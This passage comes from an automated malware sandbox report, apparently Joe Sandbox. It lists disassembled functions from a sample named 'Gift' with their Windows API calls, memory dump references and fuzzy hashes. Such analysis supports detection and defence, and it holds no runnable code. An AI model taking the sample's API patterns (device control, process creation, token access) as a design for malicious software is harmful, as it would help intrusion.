                                                                          • Opcode Fuzzy Hash: 2c56bf9749efdcbddaad8dbb5a3f9aa210340fd38c6ae3a4cd9a19963dd1f14e
                                                                          • Instruction Fuzzy Hash: 3B112736517A19AFCB272F70AC1177BB79C9F143E1F214976FA489A2D0CEB089508F80
                                                                          Function 00334365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00334385
                                                                          • _memset.LIBCMT ref: 003343A6
                                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003343F8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00334401
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                          • String ID:
                                                                          • API String ID: 1157408455-0
                                                                          • Opcode ID: dbdcc823e721d1ef8719150fde5326eaaff65a8f8803d37bb772d23064c750e7
                                                                          • Instruction ID: 968de9a45af9fd6f4afa37ed03537d44158bf58f9d63b7358309dec87fff13ad
                                                                          • Opcode Fuzzy Hash: dbdcc823e721d1ef8719150fde5326eaaff65a8f8803d37bb772d23064c750e7
                                                                          • Instruction Fuzzy Hash: 31110D759012287AD7319BA5AC4DFEBBB7CEF45760F10459AF908D7280D6744E808BA4
                                                                          Function 00346A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00337E51,?,?,00000000), ref: 002E4041
                                                                            • Part of subcall function 002E402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00337E51,?,?,00000000,?,?), ref: 002E4065
                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 00346A84
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346A8F
                                                                          • _memmove.LIBCMT ref: 00346ABC
                                                                          • inet_ntoa.WSOCK32(?), ref: 00346AC7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                          • String ID:
                                                                          • API String ID: 1504782959-0
                                                                          • Opcode ID: e0426cbef224ec9d1c7b50c314dbaf55c4f923387a8b519ff6b3cced69af5ccb
                                                                          • Instruction ID: 8778012800e9ec309fdd0bcb1fe7e0f1558fa316b559affc4ab74e5294584d5d
                                                                          • Opcode Fuzzy Hash: e0426cbef224ec9d1c7b50c314dbaf55c4f923387a8b519ff6b3cced69af5ccb
                                                                          • Instruction Fuzzy Hash: 6E115171510109AFCB05FFA4CD46CEEB7B9AF14310B148065F506A7262DF71AE24CF91
                                                                          Function 002D166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 002D16B4
                                                                          • GetClientRect.USER32(?,?), ref: 0030B93C
                                                                          • GetCursorPos.USER32(?), ref: 0030B946
                                                                          • ScreenToClient.USER32(?,?), ref: 0030B951
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 4127811313-0
                                                                          • Opcode ID: cba683ff3b113b9a2e12be83f8f3c5c0b200697ebc7e0939e24a562ec5c34f49
                                                                          • Instruction ID: 135fed85ce39d389a621c2e4dbb73b7d7bf03b75b8b715ac93b19fbd5d5b3a38
                                                                          • Opcode Fuzzy Hash: cba683ff3b113b9a2e12be83f8f3c5c0b200697ebc7e0939e24a562ec5c34f49
                                                                          • Instruction Fuzzy Hash: 5C114335A20019BBCB09EFA8D88ADBE77BDEB05300F144456F901E7650C370AE61CBA1
                                                                          Function 003296F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00329719
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032972B
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00329741
                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0032975C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: 443d8aeeff5c9cc171ea8c0f5d598f7c4545a10b541ca2bb63997c23e73cbc0f
                                                                          • Instruction ID: 3efde7abbd37329c12c187c53a9637b7460570ee103543a6eb10855f8fbab211
                                                                          • Opcode Fuzzy Hash: 443d8aeeff5c9cc171ea8c0f5d598f7c4545a10b541ca2bb63997c23e73cbc0f
                                                                          • Instruction Fuzzy Hash: 56111879901228FFEB11DF99CD85FADBBB8FB48710F204096EA04B7290D6716E11DB94
                                                                          Function 002D2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002D214F
                                                                          • GetStockObject.GDI32(00000011), ref: 002D2163
                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 002D216D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                          • String ID:
                                                                          • API String ID: 3970641297-0
                                                                          • Opcode ID: 38e3ca6f556509a7e6f2e9445f72cf4f52aeb9c6c85854945ecbcd10b73bb619
                                                                          • Instruction ID: 8d3d090f8c1db8d1b5174e64d7084a61c05ea5d0cc0b04893611c14852cca874
                                                                          • Opcode Fuzzy Hash: 38e3ca6f556509a7e6f2e9445f72cf4f52aeb9c6c85854945ecbcd10b73bb619
                                                                          • Instruction Fuzzy Hash: C3118B72111209FFDB064F90DC85EEBBB6DEF68354F048112FA0852261C771DC60DBA0
                                                                          Function 00331941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 0033195E
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 00331983
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 0033198D
                                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,003304EC,?,0033153F,?,00008000), ref: 003319C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: 9f10972589b767e1962ba1a49b50849a3fc0ec8ab956d74c877b7910cf8fe1ee
                                                                          • Instruction ID: 9d9c3760513f848116b3d0a4de4b23052092c15e77bc95b6fdd7394f7ab734b7
                                                                          • Opcode Fuzzy Hash: 9f10972589b767e1962ba1a49b50849a3fc0ec8ab956d74c877b7910cf8fe1ee
                                                                          • Instruction Fuzzy Hash: 61112731D0462DDBCF069FE5D999BEEBB78FF0A751F018195E980B2240CB7096608BD1
                                                                          Function 0035E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0035E1EA
                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0035E201
                                                                          • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0035E216
                                                                          • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0035E234
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                          • String ID:
                                                                          • API String ID: 1352324309-0
                                                                          • Opcode ID: 74afcaf41631206b12a998277da84e45be105f42af623baa50d97fabe0e20b42
                                                                          • Instruction ID: 3c7a39e6c8020a4f393d8fc545681cadb186ada8b1981dbfd142aba22ed76362
                                                                          • Opcode Fuzzy Hash: 74afcaf41631206b12a998277da84e45be105f42af623baa50d97fabe0e20b42
                                                                          • Instruction Fuzzy Hash: DB1161B52053049BE3369F51DD09F93BBBCEF00B05F108D59AA26D6464DBB0E6089FA2
                                                                          Function 003071E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                          • String ID:
                                                                          • API String ID: 3016257755-0
                                                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction ID: 5ad0319e6345dba77020f4690f46811e634fd116f9b2fd0c54ece2ff1fc7fbb4
                                                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                          • Instruction Fuzzy Hash: 1E019E3284914EBBCF135E84CC21CEE3F2ABB19340B098915FA1858171C336E9B1AB81
                                                                          Function 0035B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 0035B956
                                                                          • ScreenToClient.USER32(?,?), ref: 0035B96E
                                                                          • ScreenToClient.USER32(?,?), ref: 0035B992
                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0035B9AD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                          • String ID:
                                                                          • API String ID: 357397906-0
                                                                          • Opcode ID: 1e3baadde880529acb6c77de9a50f941bbfe8ce10a29d8b3d82291ea2e00c307
                                                                          • Instruction ID: 78cd0b482f777a112dc04ec102dd69dab16f11adbb07a5bbef794b7b2a767af8
                                                                          • Opcode Fuzzy Hash: 1e3baadde880529acb6c77de9a50f941bbfe8ce10a29d8b3d82291ea2e00c307
                                                                          • Instruction Fuzzy Hash: EA1163B9D04209EFDB41CF98C885AEEFBF9FB48310F108156E914E3220D771AA658F50
                                                                          Function 0035BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0035BCB6
                                                                          • _memset.LIBCMT ref: 0035BCC5
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00398F20,00398F64), ref: 0035BCF4
                                                                          • CloseHandle.KERNEL32 ref: 0035BD06
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$CloseCreateHandleProcess
                                                                          • String ID:
                                                                          • API String ID: 3277943733-0
                                                                          • Opcode ID: 7c39be4abbcf79a7be1362cddf202427bb2639ede4154e9d331a045c6411469f
                                                                          • Instruction ID: 14a906283d947b9b755c332763394fccc53becbafb9e724fa2c828731aa30fd0
                                                                          • Opcode Fuzzy Hash: 7c39be4abbcf79a7be1362cddf202427bb2639ede4154e9d331a045c6411469f
                                                                          • Instruction Fuzzy Hash: 95F05EB65503087FF6527B61BC06FBB7A5DEB4A751F005422FA09D51A2DBB2481087A8
                                                                          Function 00337195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 003371A1
                                                                            • Part of subcall function 00337C7F: _memset.LIBCMT ref: 00337CB4
                                                                          • _memmove.LIBCMT ref: 003371C4
                                                                          • _memset.LIBCMT ref: 003371D1
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003371E1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                          • String ID:
                                                                          • API String ID: 48991266-0
                                                                          • Opcode ID: 0f503bc0b4e6697bea931015d09fadcaad15ed2b358c84481a8cb55a478825e9
                                                                          • Instruction ID: bd93f0a4ed62fe41f24b61c5138acbaf7e307822386ff1eb6d264a7f469923b4
                                                                          • Opcode Fuzzy Hash: 0f503bc0b4e6697bea931015d09fadcaad15ed2b358c84481a8cb55a478825e9
                                                                          • Instruction Fuzzy Hash: 37F0547A100104ABCF026F55DCC5B5AFB29EF45360F04C065FE085E21ACB71A921DBB4
                                                                          Function 0035C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002D1729
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1738
                                                                            • Part of subcall function 002D16CF: BeginPath.GDI32(?), ref: 002D174F
                                                                            • Part of subcall function 002D16CF: SelectObject.GDI32(?,00000000), ref: 002D1778
                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035C3E8
                                                                          • LineTo.GDI32(00000000,?,?), ref: 0035C3F5
                                                                          • EndPath.GDI32(00000000), ref: 0035C405
                                                                          • StrokePath.GDI32(00000000), ref: 0035C413
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                          • String ID:
                                                                          • API String ID: 1539411459-0
                                                                          • Opcode ID: a0f281544a282a32e73d49ecc174acf4db80d2716c913341fe32eb7a06322385
                                                                          • Instruction ID: 657f35c51e5578ff041e69afb5ad5b47b87c7eaec98377a138cbe7bede7fa456
                                                                          • Opcode Fuzzy Hash: a0f281544a282a32e73d49ecc174acf4db80d2716c913341fe32eb7a06322385
                                                                          • Instruction Fuzzy Hash: C2F0B832009258BBDB232F52AC0EFCE3F5DAF06311F048000FA11211E287B65964DFA9
                                                                          Function 0032AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032AA6F
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0032AA82
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0032AA89
                                                                          • AttachThreadInput.USER32(00000000), ref: 0032AA90
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 2710830443-0
                                                                          • Opcode ID: deda3d281104c539968ad1012ed1ee033d7128091cf5b5186838d8edeb86f68f
                                                                          • Instruction ID: 2d22f039705f5183babeba3280a17cfe451a5e503016b4b990922c275299e20c
                                                                          • Opcode Fuzzy Hash: deda3d281104c539968ad1012ed1ee033d7128091cf5b5186838d8edeb86f68f
                                                                          • Instruction Fuzzy Hash: 64E0C931545228BBDB225FA2ED0EEEB7F5CEF167A2F008015F50995090C6B58560CBA1
                                                                          Function 002D25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSysColor.USER32(00000008), ref: 002D260D
                                                                          • SetTextColor.GDI32(?,000000FF), ref: 002D2617
                                                                          • SetBkMode.GDI32(?,00000001), ref: 002D262C
                                                                          • GetStockObject.GDI32(00000005), ref: 002D2634
                                                                          • GetWindowDC.USER32(?,00000000), ref: 0030C1C4
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0030C1D1
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0030C1EA
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0030C203
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0030C223
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0030C22E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                          • String ID:
                                                                          • API String ID: 1946975507-0
                                                                          • Opcode ID: b091b1748266056335f1da71d98428920ba70315c1619a93987bdc4aba3d164b
                                                                          • Instruction ID: 64763d75d9f0533fcd81e8fe181e96af8fa8572734df8c41ac6f68bd11107583
                                                                          • Opcode Fuzzy Hash: b091b1748266056335f1da71d98428920ba70315c1619a93987bdc4aba3d164b
                                                                          • Instruction Fuzzy Hash: B2E06531504244BBDF275F74AC0A7D93B19EB16332F04C366FA69480E187B14994DB11
                                                                          Function 00329330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThread.KERNEL32 ref: 00329339
                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00328F04), ref: 00329340
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00328F04), ref: 0032934D
                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00328F04), ref: 00329354
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                          • String ID:
                                                                          • API String ID: 3974789173-0
                                                                          • Opcode ID: efc7acc51c8a4f2d7b7cd8698389b9ff3022d05db3621b551df0ab5713daecc4
